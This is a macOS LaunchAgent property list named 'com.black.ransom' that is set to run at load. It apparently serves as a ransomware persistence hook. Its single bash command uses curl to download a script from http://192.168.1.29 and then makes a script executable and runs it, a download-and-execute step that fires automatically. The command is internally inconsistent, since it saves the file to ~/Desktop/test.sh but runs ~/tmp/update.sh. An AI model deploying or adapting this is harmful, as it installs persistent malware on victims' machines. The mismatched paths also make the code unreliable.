<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.black.ransom</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/bash</string>
        <string>-c</string>
        <string>curl -o ~/Desktop/test.sh -O http://192.168.1.29:80/final.sh &amp;&amp; chmod +x ~/tmp/update.sh &amp;&amp; ~/tmp/update.sh </string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>